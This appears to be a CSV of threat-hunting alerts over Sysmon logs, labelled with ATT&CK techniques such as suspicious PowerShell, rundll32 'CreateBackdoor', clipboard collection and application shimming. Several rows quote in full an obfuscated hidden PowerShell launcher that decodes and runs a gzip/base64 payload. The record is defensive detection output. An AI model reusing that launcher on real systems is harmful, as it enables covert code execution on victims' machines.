4 1 0 0x8000000000000000 243558 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.452 747F3D96-9F69-5E75-0000-001035972000 1388 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,Critical,"Found User (NT AUTHORITY\SYSTEM) run Suspicious PowerShell commands that include ( -c ,[Convert]::FromBase64String,hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden , -c ,[Convert]::FromBase64String,hidden,Hidden,ls, -noni ,-noni,-nop,powershell, -w , -w hidden ,WindowStyle) in event with Command Line ("powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);") in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 9809 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:26:52.356 365ABB72-AF8C-5CC8-0000-001003361900 2484 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-2586-5CC9-0000-0020E7030000 0x3e7 0 System SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-AF8B-5CC8-0000-0010AC1B1900 3872 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1594332367.487274,2020-07-10T02:06:07.487274+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 311382 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-07-09 22:05:55.880 747F3D96-94C3-5F07-0000-001080B40100 3096 C:\Windows\System32\cmd.exe 10.0.17763.592 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation Cmd.Exe cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-1350-5F08-0000-0020E7030000 0x3e7 0 System SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 00000000-0000-0000-0000-000000000000 628 ? ? ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1115] Clipboard Data Collection,1594376435.589722,2020-07-10T14:20:35.589722+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rdpclip.exe ) through command line ( rdpclip ),1," 1 5 4 1 0 0x8000000000000000 311396 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-07-10 10:20:34.877 747F3D96-40F2-5F08-0000-0010D8A92C00 3304 C:\Windows\System32\rdpclip.exe 10.0.17763.1131 (WinBuild.160101.0800) RDP Clipboard Monitor Microsoft® Windows® Operating System Microsoft Corporation rdpclip.exe rdpclip C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-94CD-5F07-0000-0020ABBF0300 0x3bfab 1 Medium SHA1=0265C1718EC95B025D9719F3B4872826F8F4661F,MD5=9E089ECF8B86983B7A77E3844CD02BB5,SHA256=AF5CAE4B514215E530643A7FEA2D7A47A1B15F6E5610347B217D1ABFA4AE0F92,IMPHASH=E3F33CEBF67721DAC951AFBD20321206 747F3D96-1350-5F08-0000-001014C50000 824 C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -s TermService ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1584766825.46327,2020-03-21T09:00:25.463270+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," 1 5 4 1 0 0x8000000000000000 243558 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-03-21 05:00:25.452 747F3D96-9F69-5E75-0000-001035972000 1388 C:\Windows\System32\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE rundll32 windowscoredeviceinfo.dll,CreateBackdoor C:\Windows\system32\ NT AUTHORITY\SYSTEM 747F3D96-9DBA-5E75-0000-0020E7030000 0x3e7 0 System SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A 747F3D96-9DBC-5E75-0000-00102C390100 1652 C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1138] Application Shimming - process,1553028568.168278,2019-03-20T00:49:28.168278+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1," 1 5 4 1 0 0x8000000000000000 1966403 Microsoft-Windows-Sysmon/Operational PC01.example.corp 2019-03-19 20:49:28.058 365ABB72-55D8-5C91-0000-001060C90700 3648 C:\Windows\System32\sdbinst.exe 6.0.7600.16385 (win7_rtm.090713-1255) Application Compatibility Database Installer Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\sdbinst.exe" -q -u "C:\Windows\AppPatch\Test.SDB " C:\Windows\System32\ EXAMPLE\user01 365ABB72-5417-5C91-0000-002035340300 0x33435 1 High MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F 365ABB72-551C-5C91-0000-001030590500 2704 C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe "C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe" ",PC01.example.corp,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1556656012.371714,2019-05-01T00:26:52.371714+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) )",1," 1 5 4 1 0 0x8000000000000000 9809 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-04-30 20:26:52.356 365ABB72-AF8C-5CC8-0000-001003361900 2484 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0